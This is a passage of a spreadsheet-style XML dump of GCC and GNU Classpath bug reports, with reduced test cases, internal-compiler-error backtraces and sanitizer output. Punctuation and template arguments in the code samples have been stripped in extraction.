            (reg:V4SI 34 v2 [ mask ]))
        (reg/v:V4SI 77 [ b ])))
whereas before it successfully matched the aarch64_simd_bsl_internal pattern in aarch64-simd.md with:
(set (reg:V4SI 79)
    (xor:V4SI (and:V4SI (xor:V4SI (reg/v:V4SI 77 [ b ])
                (reg:V4SI 32 v0 [ a ]))
            (reg:V4SI 34 v2 [ mask ]))
        (reg/v:V4SI 77 [ b ])))
note that reg/v 77 and reg v0 swapped places.
This is a deficiency in the aarch64 combine pattern.</t>
  </si>
  <si>
    <t>GCC-79244</t>
  </si>
  <si>
    <t>[7 Regression] ice in replace_uses_by at tree-cfg.c:1866</t>
  </si>
  <si>
    <t>Created attachment 40590
C source code
The attached code when compiled by gcc trunk and flag -O2 does this:
$ ../results/bin/gcc -c -O2 bug331.c
source/pdf/pdf-repair.c: In function â€˜pdf_repair_objâ€™:
source/pdf/pdf-repair.c:31:1: internal compiler error: in replace_uses_by at tree-cfg.c:1866
0xcdcbbe replace_uses_by(tree_node* tree_node*)
	../../trunk/gcc/tree-cfg.c:1866
0xf4e82e remove_range_assertions
	../../trunk/gcc/tree-vrp.c:6978
0xf4e82e execute_vrp
	../../trunk/gcc/tree-vrp.c:11299
0xf4e82e execute
	../../trunk/gcc/tree-vrp.c:11377
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
This bug seems to have existed since sometime before revision 241433
dated 20161115.
Reduced code seems to be
typedef enum {
  PDF_TOK_EOF
  PDF_TOK_OPEN_DICT
  PDF_TOK_INT
  PDF_TOK_STREAM
} pdf_token
pdf_repair_obj() {
  pdf_token a
  __sigsetjmp()
  while (a != PDF_TOK_STREAM &amp;&amp; a &amp;&amp; a &amp;&amp; a != PDF_TOK_INT)
    a = pdf_lex()
}</t>
  </si>
  <si>
    <t>GCC-80072</t>
  </si>
  <si>
    <t>[7 Regression] ICE in gimple_build_assign_1 with -O3 -march=broadwell/skylake-avx512</t>
  </si>
  <si>
    <t>Created attachment 40988
Reproducer.
GCC fails with ICE with -O3 -march=broadwell/skylake-avx512 options.
Error:
&gt;$ g++ -O3 -c -w -march=broadwell repr.cpp
internal compiler error: in gimple_build_assign_1 at gimple.c:422
 void foo () {
      ^~~
0xabf24b gimple_build_assign_1
	/home/vsevolod/workspace/gcc-dev/trunk/gcc/gimple.c:422
0xabf24b gimple_build_assign(tree_node* tree_code tree_node* tree_node*)
	/home/vsevolod/workspace/gcc-dev/trunk/gcc/gimple.c:453
0xf1af6d rewrite_expr_tree
	/home/vsevolod/workspace/gcc-dev/trunk/gcc/tree-ssa-reassoc.c:4242
0xf1abb8 rewrite_expr_tree
	/home/vsevolod/workspace/gcc-dev/trunk/gcc/tree-ssa-reassoc.c:4287
        (.........)
GCC version:
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/vsevolod/workspace/gcc-dev/bin-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /home/vsevolod/workspace/gcc-dev/trunk/configure --prefix=/home/vsevolod/workspace/gcc-dev/bin-trunk
Thread model: posix
gcc version 7.0.1 20170315 (experimental) (GCC)
Test case is huge and creduce has failed to reduce it further.</t>
  </si>
  <si>
    <t>GCC-60130</t>
  </si>
  <si>
    <t>Sorry unimplemented: mangling argument_pack_select</t>
  </si>
  <si>
    <t>Hello.
Consider the following code in C++11:
------------------------------------------------------
#include 
template 
S f1(F f T... x)
{
    return std::get(std::make_tuple(f(x)...))
}
template 
int f2(const T... x)
{
    return std::get(std::make_tuple(f1([](int n){return n} x)...))
}
int main()
{
    return f2(42)
}
------------------------------------------------------
Under g++ 4.8.1 and 4.8.2 (I have not tried 4.9.0) it produces the following compilation error: sorry unimplemented: mangling argument_pack_select. This code compiles without any error under intel and clang.</t>
  </si>
  <si>
    <t>GCC-66828</t>
  </si>
  <si>
    <t>[5/6 Regression] gcc/tree-ssa-math-opts.c:2182:38: runtime error: left shift of 72057594037927936 by 8 places cannot be represented in type 'long int'</t>
  </si>
  <si>
    <t>since r219525 bootstrap-ubsan shows:
gcc/tree-ssa-math-opts.c:2182:38: runtime error: left shift of 72057594037927936 by 8 places cannot be represented in type 'long int'</t>
  </si>
  <si>
    <t>CLASSPATH-27239</t>
  </si>
  <si>
    <t>Images shown with wrong color on powerpc (big endian)</t>
  </si>
  <si>
    <t>Failure observed:
        Images from the go stones and avatars have the wrong colors
        for the go applets from games.yahoo.com/go
        Especially the black stones are almost invisible and there is
        a white transparancy when they are displayed.
Observations:
                This works on ia86 (little endian)
                but not on ppc (big endian).
                The bug can be seen with jamvm 1.4.2
                classpath-0.90 with Mouse events patch from http://cvs.savannah.gnu.org/viewcvs/classpath/classpath/java/awt/LightweightDispatcher.java.diff?tr1=1.2&amp;tr2=1.3&amp;r1=text&amp;r2=text
        Hypothesis: A bug in the image handling code regarding endianess.
Meanwhile I could reproduce this with the testcase
        from http://gcc.gnu.org/bugzilla/show_bug.cgi?id=24116
I will attach a screenshot.
The test case uses different methods to draw the image.
As not all tiles have wrong colors possibly only one methods is broken.
Further ideas attempts:
Search for
        find native/jni/gtk-peer  -name *.c | xargs grep -i &lt;&lt;
        find native/jni/gtk-peer  -name *.c | xargs grep -i &gt;&gt;
        finds bitshifts in
                gnu_java_awt_peer_gtk_GdkPixbufDecoder.c
                gnu_java_awt_peer_gtk_GdkGraphics.c
                gnu_java_awt_peer_gtk_GtkImage.c
                gnu_java_awt_peer_gtk_GtkToolkit.c
        A look in gnu_java_awt_peer_gtk_GdkPixbufDecoder.c reveals that
        there are comments about the endianess.
        grep -i endian *
        finds mentions in
                gnu_java_awt_peer_gtk_GdkPixbufDecoder.c
                gnu_java_awt_peer_gtk_GdkRobotPeer.c
        Inspection in gnu_java_awt_peer_gtk_GdkPixbufDecoder.c shows
        that Java_gnu_java_awt_peer_gtk_GdkPixbufDecoder_streamImage()
        smells as there is a comment that RGB is in host memory order
        but no special handling regarding endianess.</t>
  </si>
  <si>
    <t>bernhard</t>
  </si>
  <si>
    <t>GCC-48116</t>
  </si>
  <si>
    <t>-Wreturn-type does not work as advertised</t>
  </si>
  <si>
    <t>I'm using svn trunk gcc as of today.
-Wreturn-type is documented as:
  [... warn] about a `return' statement with a expression
  in a function whose return-type is `void'.
I tried it with this test case:
void x (void) { }
void y(void) { return x() }
I expected a warning on the `return' but did not get one:
I used gcc -Wreturn-type -O2 -c q.c</t>
  </si>
  <si>
    <t>GCC-45741</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: SIGSEGV in string_constant (expr.c:9863) when parsing memcmp()</t>
  </si>
  <si>
    <t>Command line:
$ gcc testcase.c
$ cat testcase.c
static const int data[2048]
void foo (void *ptr)
{
  __builtin_memcmp (data ptr 1)
}
Relevant valgrind output:
$ valgrind --trace-children=yes /mnt/svn/gcc-trunk/binary-164484-lto-fortran-checking-yes-rtl-df/bin/gcc testcase.c
==13187== Invalid read of size 2
==13187==    at 0x6935CC: string_constant (expr.c:9863)
==13187==    by 0x57808E: c_getstr (builtins.c:580)
==13187==    by 0x59940E: fold_builtin_3 (builtins.c:8819)
==13187==    by 0x58C7FB: fold_builtin_n (builtins.c:10622)
==13187==    by 0x58EAE9: fold_builtin_call_array (builtins.c:10857)
==13187==    by 0x500B83: build_function_call_vec (c-typeck.c:2798)
==13187==    by 0x50C7CD: c_parser_postfix_expression_after_primary (c-parser.c:6037)
==13187==    by 0x51063C: c_parser_postfix_expression (c-parser.c:5923)
==13187==    by 0x50972E: c_parser_unary_expression (c-parser.c:5322)
==13187==    by 0x50A642: c_parser_cast_expression (c-parser.c:5185)
==13187==    by 0x50A809: c_parser_binary_expression (c-parser.c:5001)
==13187==    by 0x50AF4C: c_parser_conditional_expression (c-parser.c:4782)
==13187==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==13187== 
testcase.c: In function 'foo':
testcase.c:5:3: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r164484 - crash
r163636 - OK</t>
  </si>
  <si>
    <t>GCC-4941</t>
  </si>
  <si>
    <t>an internal compiler error
Release:
gcc version 2.95.3 20010315 (release) [FreeBSD]
Environment:
FreeBSD 4.4-RELEASE on an Pentium 60mhz
How-To-Repeat:
c++ -DHAVE_CONFIG_H -I. -I. -I..   -I/usr/local/include  -g -O2 -g -I/usr/local/include -I/usr/local/include -save-temps -c axisalignedbox.cpp
prints:
/usr/include/g++/stl_construct.h: In method `pair__default_alloc_template &gt;Atlas::Message::Object&gt;::pair(const pair__default_alloc_template &gt;Atlas::Message::Object&gt; &amp;)':
/usr/include/g++/stl_tree.h:556:   instantiated from `_Rb_tree__default_alloc_template &gt;pair__default_alloc_template &gt;Atlas::Message::Object</t>
  </si>
  <si>
    <t>billyjoeray</t>
  </si>
  <si>
    <t>GCC-15259</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] segv</t>
  </si>
  <si>
    <t>GCC-16287</t>
  </si>
  <si>
    <t>Test csqrt_1.f90 fails on irix6.5</t>
  </si>
  <si>
    <t>Test execute/csqrt_1.f90 fails on irix6.5
Test SQRT(complex) FAILED
 Got  (  0.000000      0.000000    )  expected  (  2.000000      
0.000000    )
Test CSQRT(complex) FAILED
 Got  (  0.000000      0.000000    )  expected  (  2.000000      
0.000000    )
Test CSQRT FAILED
 Got  (  0.000000      0.000000    )  expected  (  2.000000      
0.000000    )
Abort (core dumped)
Will follow up as time permits</t>
  </si>
  <si>
    <t>GCC-7399</t>
  </si>
  <si>
    <t>Exception object destructors called pre-maturely.</t>
  </si>
  <si>
    <t>The context of this bug is a method that throws an exception containing an error message and a calling method that catches the exception. The exception object news some memory in its constructor and deletes it in its destructor. The destructor is called and the memory is deleted in the method that does the throw. Thus the catching method gets an exception object with a corrupted message buffer. 
For what its worth... the program the test program was based on works on windows when compiled with the visual c++ compiler. The test program fails on both linux and cygwin.
Release:
g++ 2.96
Environment:
linux 2.4.2-2 #1 on i686
How-To-Repeat:
Compile and run the program that comprises the second part of the attachment. Set and export the environment variable MALLOC_CHECK_=1. When the test program is run usually the message attached to the exception object has been corrupted when it is caught. Also MALLOC_CHECK will report that the message buffer is free'd after already being free'd.</t>
  </si>
  <si>
    <t>lclay</t>
  </si>
  <si>
    <t>GCC-10152</t>
  </si>
  <si>
    <t>members of nested class granted special access to enclosing class</t>
  </si>
  <si>
    <t>Contrary to the C++ standard section 11.8 clause 1 gcc grants nested classes special access privileges to members of their enclosing class.
This bug is present both in gcc 3.2.2 and in the gcc 3.3 branch from February 10.  Based on a different testcase (in Mozilla source) I believe the bug is also present in egcs gcc 2.95 etc.
The following is a simplified variant of the example given in C++ 11.8 clause 1 which compiles with g++ -ansi -pedantic even though it contains an error:
----------
/*
 * This is a reduced form of the example in C++ 11.8 
 * clause 1 which says that The members of a nested
 * class have no special access to members of an
 * enclosing class.
 */
class E {
    class B {}
    class I {
        B b // error: E::B is private
    }
}
int main()
{
    return 1
}
----------
Release:
gcc 3.2.2
How-To-Repeat:
Compile above example with g++ -ansi -pedantic.</t>
  </si>
  <si>
    <t>CLASSPATH-16727</t>
  </si>
  <si>
    <t>MouseEvents not being consumed.</t>
  </si>
  <si>
    <t>Attached test case. Run and you'll see that two events are dispatched per mouse
movement.
What should happen is that the Label should grab the event and consume it.</t>
  </si>
  <si>
    <t>GCC-48076</t>
  </si>
  <si>
    <t>Unsafe double checked locking in __emutls_get_address</t>
  </si>
  <si>
    <t>The following piece of code around emutls.c:138 uses double checked locking to initialize a tls offset to the next available value.
  pointer offset = obj-&gt;loc.offset
  if (__builtin_expect (offset == 0 0))
    {
      static __gthread_once_t once = __GTHREAD_ONCE_INIT
      __gthread_once (
      __gthread_mutex_lock (
      offset = obj-&gt;loc.offset
      if (offset == 0)
        {
          offset = ++emutls_size
          obj-&gt;loc.offset = offset
        }
      __gthread_mutex_unlock (
    }
  struct __emutls_array *arr = __gthread_getspecific (emutls_key)
This code needs more barriers to be correct. For example it is entirely possible for emutls_key value used in the last line of the code snippet to be prefetched before obj-&gt;loc.offset is loaded and consequently before emutls_init is called. In short there needs to be a happens-before relationship between obj-&gt;loc.offset assignment and the unprotected read at the first line.
This looks unlikely on x86 but it may be a much bigger deal on ARM.
This was detected with ThreadSanitizer (http://code.google.com/p/data-race-test/wiki/ThreadSanitizer) on an Android device.
==822== WARNING: Possible data race during read of size 4 at 0x44B74: {{{
==822==    T14 (L{}):
==822==     #0  0xB7E0: __emutls_get_address gcc/emutls.c:138
==822==     #1  0x1BFD5: NegativeTests_PerThreadTest::RealWorker() unittest/racecheck_unittest.cc:5665
==822==     #2  0x80107324: ThreadSanitizerStartThread tsan/ts_valgrind_intercepts.c:679
==822==   Concurrent write(s) happened at (OR AFTER) these points:
==822==    T12 (L{L312}):
==822==     #0  0xB80C: __emutls_get_address gcc/emutls.c:145
==822==     #1  0x1BFD5: NegativeTests_PerThreadTest::RealWorker() unittest/racecheck_unittest.cc:5665
==822==     #2  0x80107324: ThreadSanitizerStartThread tsan/ts_valgrind_intercepts.c:679
==822==   Address 0x44B74 is 8 bytes inside data symbol __emutls_v._ZN27NegativeTests_PerThreadTestL17per_thread_globalE
==822==   Locks involved in this report (reporting last lock sites): {L312}
==822==    L312 (0x44C18)
==822==     #0  0x80108084: pthread_mutex_lock tsan/ts_valgrind_intercepts.c:934
==822==     #1  0xB808: __emutls_get_address gcc/gthr-posix.h:768
==822==     #2  0x1BFD5: NegativeTests_PerThreadTest::RealWorker() unittest/racecheck_unittest.cc:5665
==822==     #3  0x80107324: ThreadSanitizerStartThread tsan/ts_valgrind_intercepts.c:679
==822==    Race verifier data: 0xB7E00xB80C
==822== }}}</t>
  </si>
  <si>
    <t>GCC-26114</t>
  </si>
  <si>
    <t>[4.2 Regression] g++.dg/init/ctor4.C and g++.old-deja/g++.jason/overload34.C and g++.old-deja/g++.mike/p11110.C fails</t>
  </si>
  <si>
    <t>/Users/pinskia/src/gcc/local/gcc/gcc/testsuite/g++.dg/init/ctor4.C:11: warning: non-static reference 'int&amp; bar::a' in class without a constructor</t>
  </si>
  <si>
    <t>GCC-13955</t>
  </si>
  <si>
    <t>LAPACK file causes ICE (zhbgst.f)</t>
  </si>
  <si>
    <t>compiling zhbgst.f in the LAPACK distribution causes an ICE.
This happens with -O2 which is the default for LAPACK but not for -O0.
Below is the backtrace:
(gdb) set args -O2 zhbgst.f
(gdb) run
Starting program: /home/bdavis/sw/gfortran/sbox31dec/bin/gcc/f951 -O2 zhbgst.f
 zhbgst
 {GC 5368k -&gt; 2194k} {GC 5542k -&gt; 2078k} {GC 5326k -&gt; 2205k}
Program received signal SIGSEGV Segmentation fault.
0x0811bf36 in rtx_equal_for_memref_p (x=0xbed78798 y=0xbed7878c) at
../../gcc/gcc/alias.c:1208
1208          switch (fmt[i])
(gdb) bt
#0  0x0811bf36 in rtx_equal_for_memref_p (x=0xbed78798 y=0xbed7878c) at
../../gcc/gcc/alias.c:1208
#1  0x0811cb00 in memrefs_conflict_p (xsize=8 x=0xbeb079b4 ysize=8
y=0xbeb079a8 c=-8) at ../../gcc/gcc/alias.c:1620
#2  0x08120c23 in true_dependence (mem=0xbebaf7c8 mem_mode=DFmode
x=0xbebaf618 varies=0x78) at ../../gcc/gcc/alias.c:2126
#3  0x082bc681 in loop_invariant_p (loop=0x8c2fa30 x=0xbebaf618) at
../../gcc/gcc/loop.c:3370
#4  0x082c7a52 in scan_loop (loop=0x8c2fa30 flags=8) at ../../gcc/gcc/loop.c:882
#5  0x082ca5dd in loop_optimize (f=0xbf1e1f00 dumpfile=0x78 flags=8) at
../../gcc/gcc/loop.c:539
#6  0x0833e7e2 in rest_of_handle_loop_optimize (decl=0x0 insns=0xbf1e1f00) at
../../gcc/gcc/toplev.c:3046
#7  0x0833eebd in rest_of_compilation (decl=0xbf2d2570) at
../../gcc/gcc/toplev.c:3359
#8  0x080c04b5 in tree_rest_of_compilation (fndecl=0xbf2d2570 nested_p=false)
at ../../gcc/gcc/tree-optimize.c:568
#9  0x08087b61 in expand_function_body (fndecl=0xbf2d2570 nested=0) at
../../gcc/gcc/fortran/f95-lang.c:205
#10 0x0808ff7c in gfc_generate_function_code (ns=0xbf34a5e8) at
../../gcc/gcc/fortran/trans-decl.c:1945
#11 0x0808bc83 in gfc_generate_code (ns=0x8a98cc8) at
../../gcc/gcc/fortran/trans.c:630
#12 0x080726dc in gfc_parse_file () at ../../gcc/gcc/fortran/parse.c:2485
#13 0x08088d66 in gfc_be_parse_file (set_yydebug=0) at
../../gcc/gcc/fortran/f95-lang.c:284
#14 0x0834144d in toplev_main (argc=120 argv=0x8a76c89) at
../../gcc/gcc/toplev.c:1852
#15 0x00ad6750 in __libc_start_main () from /lib/tls/libc.so.6
#16 0x0804acc1 in _start ()
(gdb)</t>
  </si>
  <si>
    <t>GCC-49718</t>
  </si>
  <si>
    <t>please allow no_instrument_function attribute in class member definition/declaration</t>
  </si>
  <si>
    <t>it says
instrument.cc:10:6: error: canâ€™t set â€˜no_instrument_functionâ€™ attribute after definition
isn't it false-positive? because in class/struct it is normal one to define such member function in it.
#include 
struct t
{
public:
t()
__attribute__((no_instrument_function)) void a(){
}
void __attribute__((no_instrument_function))b(){
}
void c() __attribute__((no_instrument_function)){
}
void d() __attribute__((no_instrument_function))
}
void t::d()
{}
int main()
{
t a
a.a()
}
$ g++ instrument.cc  -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/i686-pc-cygwin/4.7.0/lto-wrapper.exe
Target: i686-pc-cygwin
Configured with: ./configure --config-cache --prefix=/usr --disable-win32-registry --enable-threads=win32 --enable-languages=cc++lto --with-win32-nlsapi=unicode --enable-tls --disable-bootstrap --enable-shared --disable-sjlj-exceptions --enable-gomp
Thread model: win32
gcc version 4.7.0 20110708 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-v' '-shared-libgcc' '-mtune=generic' '-march=pentiumpro'
 /usr/libexec/gcc/i686-pc-cygwin/4.7.0/cc1plus.exe -quiet -v -D__CYGWIN32__ -D__CYGWIN__ -Dunix -D__unix__ -D__unix -idirafter /usr/lib/gcc/i686-pc-cygwin/4.7.0/../../../../i686-pc-cygwin/lib/../include/w32api -idirafter /usr/lib/gcc/i686-pc-cygwin/4.7.0/../../../../i686-pc-cygwin/lib/../../include/w32api instrument.cc -quiet -dumpbase instrument.cc -mtune=generic -march=pentiumpro -auxbase instrument -version -o /tmp/ccqnGK06.s
GNU C++ (GCC) version 4.7.0 20110708 (experimental) (i686-pc-cygwin)
        compiled by GNU C version 4.7.0 20110622 (experimental) GMP version 5.0.0 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring duplicate directory /usr/include
ignoring duplicate directory /usr/lib/gcc/i686-pc-cygwin/4.7.0/../../../../i686-pc-cygwin/lib/../../include/w32api
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/i686-pc-cygwin/4.7.0/../../../../include/c++/4.7.0
 /usr/lib/gcc/i686-pc-cygwin/4.7.0/../../../../include/c++/4.7.0/i686-pc-cygwin
 /usr/lib/gcc/i686-pc-cygwin/4.7.0/../../../../include/c++/4.7.0/backward
 /usr/lib/gcc/i686-pc-cygwin/4.7.0/include
 /usr/local/include
 /usr/lib/gcc/i686-pc-cygwin/4.7.0/include-fixed
 /usr/lib/gcc/i686-pc-cygwin/4.7.0/../../../../i686-pc-cygwin/include
 /usr/lib/gcc/i686-pc-cygwin/4.7.0/../../../../i686-pc-cygwin/lib/../include/w32api
End of search list.
GNU C++ (GCC) version 4.7.0 20110708 (experimental) (i686-pc-cygwin)
        compiled by GNU C version 4.7.0 20110622 (experimental) GMP version 5.0.0 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 68ba7c3bade77b76b9651c346a28b1de
instrument.cc:6:46: error: canâ€™t set â€˜no_instrument_functionâ€™ attribute after definition
instrument.cc:8:45: error: canâ€™t set â€˜no_instrument_functionâ€™ attribute after definition
instrument.cc:10:6: error: canâ€™t set â€˜no_instrument_functionâ€™ attribute after definition</t>
  </si>
  <si>
    <t>GCC-79116</t>
  </si>
  <si>
    <t>ICE on cilkplus array notation with a _Cilk_for</t>
  </si>
  <si>
    <t>This is similar to pr70565 but fails in an entirely different manner in the C front-end:
abulafia:/build/t/gcc$ cat b.c
int array[1024]
void foo()
{
  _Cilk_for (int i = 0 i &lt; 512 ++i)
    array[:] = __sec_implicit_index(0)
}
abulafia:/build/t/gcc$ ./cc1 b.c -fcilkplus -quiet -I./
b.c: In function â€˜fooâ€™:
b.c:5:14: error: type mismatch in binary expression
     array[:] = __sec_implicit_index(0)
     ~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~
int
long int
int
D.1962 = 0 + D.1961
b.c:5:14: internal compiler error: verify_gimple failed
0xed8e66 verify_gimple_in_seq(gimple*)
        /source/gcc/gcc/tree-cfg.c:4934
0xd62e0e execute_function_todo
        /source/gcc/gcc/passes.c:1967
0xd61e86 do_per_function
        /source/gcc/gcc/passes.c:1649
0xd62fc6 execute_todo
        /source/gcc/gcc/passes.c:2015
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-25456</t>
  </si>
  <si>
    <t>[4.2 Regression] cc0 targets are broken.</t>
  </si>
  <si>
    <t>Hello
building an avr cross compiler from trunk fails with:
gcc -c   -g -O2 -DIN_GCC -DCROSS_COMPILE  -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wn
o-variadic-macros -Wold-style-definition -Wmissing-format-attribute -fno-common   -DHAVE_CONFIG_H -I. -I. -I/tmp/trunk/gcc 
-I/tmp/trunk/gcc/. -I/tmp/trunk/gcc/../include -I/tmp/trunk/gcc/../libcpp/include  -I/tmp/trunk/gcc/../libdecnumber    /tmp/trunk/gcc/struct-equiv.c -o struct-equiv.o
/tmp/trunk/gcc/struct-equiv.c: In function 'struct_equiv_improve_checkpoint':
/tmp/trunk/gcc/struct-equiv.c:252: error: 'struct equiv_info' has no member named 'x_start'
/tmp/trunk/gcc/struct-equiv.c:252: error: 'struct equiv_info' has no member named 'x_start'
make[2]: *** [struct-equiv.o] Error 1
I'm not sure if this is avr related.</t>
  </si>
  <si>
    <t>GCC-70442</t>
  </si>
  <si>
    <t>[6 Regression] gcc ICE at -O2 and above on valid code on x86_64-linux-gnu in extract_insn</t>
  </si>
  <si>
    <t>The following valid code causes an ICE when compiled with the current gcc trunk at -O2 and above on x86_64-linux-gnu in both 32-bit mode only.
It should be a 6 regression.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/home/absozero/trunk/root-gcc/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/home/absozero/trunk/root-gcc --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20160329 (experimental) [trunk revision 234517] (GCC) 
$ gcc-trunk -m32 -O2 abc.c
abc.c: In function â€˜fn1â€™:
abc.c:11:1: error: unrecognizable insn:
 }
 ^
(insn 17 16 27 2 (set (subreg:V2DI (reg/v:DI 92 [ b ]) 0)
        (reg/v:DI 87 [ b ])) abc.c:9 -1
     (expr_list:REG_DEAD (reg/v:DI 87 [ b ])
        (nil)))
abc.c:11:1: internal compiler error: in extract_insn at recog.c:2287
0xaf5528 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:108
0xaf5559 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:116
0xac2721 extract_insn(rtx_insn*)
	../../gcc/gcc/recog.c:2287
0x1276dbe decompose_multiword_subregs
	../../gcc/gcc/lower-subreg.c:1465
0x127803d execute
	../../gcc/gcc/lower-subreg.c:1735
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ cat abc.c
char a c
void fn1() {
  long long b
  long m
  int d
  switch (d)
  case 5:
  b = a
  b ^= m
  c = b &gt;&gt; b
}</t>
  </si>
  <si>
    <t>GCC-912</t>
  </si>
  <si>
    <t>TImode shouldn't be used on 32-bit hosts.</t>
  </si>
  <si>
    <t xml:space="preserve">	while building a sparc64-elf compiler the compilation of libgcc fails
	due to attempts to use TImode on a 32-bit host.  most of the system
	correctly tests for this but libgcc2.h has regressed since GCC 2.95.2.
/croc/mrg/gcc/egcs/gcc/libgcc2.h:99: no data type for mode `TI'
/croc/mrg/gcc/egcs/gcc/libgcc2.h:100: no data type for mode `TI'
Release:
2.97 20001126 (experimental)
Environment:
System: NetBSD everglades.eterna.com.au 1.5K NetBSD 1.5K (EVERGLADES) #49: Sun Nov 19 10:35:27 EST 2000 mrg@everglades.eterna.com.au:/orb/j/src/sys/arch/sparc64/compile/EVERGLADES sparc64
host: sparc-unknown-netbsd
build: sparc-unknown-netbsd
target: sparc64-elf
configured with: /croc/mrg/gcc/egcs/configure --prefix=/usr/toolchain sparc64-elf
How-To-Repeat:
	build a compiler --target=sparc64-elf on a x86 box.</t>
  </si>
  <si>
    <t>GCC-9050</t>
  </si>
  <si>
    <t>[DR 147] Can't explicitly specialize C++ constructor templates</t>
  </si>
  <si>
    <t>C++ function templates can be explicitly instantiated.
Constructors can be function templates.
So the following should compile 
(and indeed does with icc and Comeau C++)
struct Y
{
  template  Y (T)
  template  void foo (T)
}
template  void Y::foo      (bool) { }
template  void Y::foo (int)  { }
template       Y::Y        (bool) { }
template       Y::Y   (int)  { }
Explicit instantiation of Y::foo 
but not Y::Y is permitted.
g++ gives these errors:
(not only is g++ wrong to give an error
but the error message below contains the nonsensical
no member function `._0' declared)
constructor-explicit-instantiation-bug.cc:11: `Y' is not a template
constructor-explicit-instantiation-bug.cc:11: ISO C++ forbids declaration of `
   type name' with no type
constructor-explicit-instantiation-bug.cc:11: abstract declarator `int 
   (Y::)(int)' used as declaration
constructor-explicit-instantiation-bug.cc:11: no member function `._0' declared 
   in `Y'
constructor-explicit-instantiation-bug.cc:11: syntax error before `{' token
Release:
g++ 3.2.1
Environment:
Linux x86
How-To-Repeat:
Compile the provided fragment with g++ -c</t>
  </si>
  <si>
    <t>GCC-28249</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] long long long accepted by catch</t>
  </si>
  <si>
    <t>The following invalid code is accepted since GCC 4.0.3:
================================
void foo()
{
  try {}
  catch (long long long) {}
}
================================</t>
  </si>
  <si>
    <t>GCC-10040</t>
  </si>
  <si>
    <t>Incorrect warning message for bit fields</t>
  </si>
  <si>
    <t>warning: comparison is always 0 due to width of bit-field
message is generated because a 1 bit field is tested against
one:
    int _v: 1
    if ((*tlb)._hi._v == 1)
This message comes from around line 3132 in fold-const.c
where a comment says the constant shifted right by the 
field length should be all zero and then proceeds to 
create trees for (1 &gt;&gt; (lbitsize-1)) and see if the result
is zero (or all ones).  But lbitsize is 1 so lbitsize-1
is zero and this quantity is then (1 &gt;&gt; 0) which is still
1 and hence non-zero (but is all one's to the size of the
bit field so maybe the problem is integer_all_onesp).
This code is followed by explicit code dealing with 
single-bit compares.
In trying to explain the problem I'm beginning to see
that this error message is a result of the bit field 
being an int (signed) rather than unsigned int. 
In which case maybe the problem is best addressed by
a different warning message -- bit field too small for
value and sign bit consider unsigned type for field
Release:
3.2.2
Environment:
RedHat Linux 7.1 on AMD Athlon</t>
  </si>
  <si>
    <t>peterson</t>
  </si>
  <si>
    <t>GCC-22274</t>
  </si>
  <si>
    <t>[4.1 Regression] string[1-4].m const-str-5.m fails with the gnu runtime</t>
  </si>
  <si>
    <t>These tests fail with the GNU runtime.
The following is a reduced testcase:
@interface NXConstantString
{
  Class isa
  char *c_string
  unsigned int len
}
@end
void g(void)
{
 @
}</t>
  </si>
  <si>
    <t>zlaski</t>
  </si>
  <si>
    <t>GCC-63485</t>
  </si>
  <si>
    <t>[5 Regression] ICE: canonical types differ for identical types A::type and const char_type [3]</t>
  </si>
  <si>
    <t>Running the Boost testsuite shows:
markus@x4 /tmp % cat date_time_format_parser.ii
template  struct A
{
  typedef C type
}
template  class B
{
}
template  void as_literal (Range 
template  struct C
{
  typedef wchar_t char_type
  const char_type on_full_year_placeholder[3]
  void
  on_extended_iso_date ()
  {
    B::type&gt; a
    as_literal (on_full_year_placeholder)
  }
}
template  struct date_time_format_parser_callback : C
{
}
template  struct D
{
  typedef typename BaseT::char_type char_type
  char_type
  parse (const char_type * const char_type *
         typename BaseT::callback_type p3)
  {
    p3.on_extended_iso_date ()
  }
}
struct F
{
  typedef date_time_format_parser_callback callback_type
  typedef wchar_t char_type
}
template 
void
parse_format (CharT *p1 ParserT p2 CallbackT p3)
{
  CharT p = p2.parse (
}
template 
void
parse_date_time_format (const CharT * const CharT *p2
                        date_time_format_parser_callback &amp;p3)
{
  D b
  parse_format (p2 b p3)
}
template void
parse_date_time_format (const wchar_t * const wchar_t *
                        date_time_format_parser_callback 
markus@x4 /tmp % g++ -c -w -O0 date_time_format_parser.ii
date_time_format_parser.ii: In instantiation of â€˜void C &gt;::on_extended_iso_date() [with  = wchar_t]â€™:
date_time_format_parser.ii:30:5:   required from â€˜D::char_type D::parse(const char_type* const char_type* typename BaseT::callback_type) [with BaseT = F D::char_type = wchar_t typename BaseT::callback_type = date_time_format_parser_callback]â€™
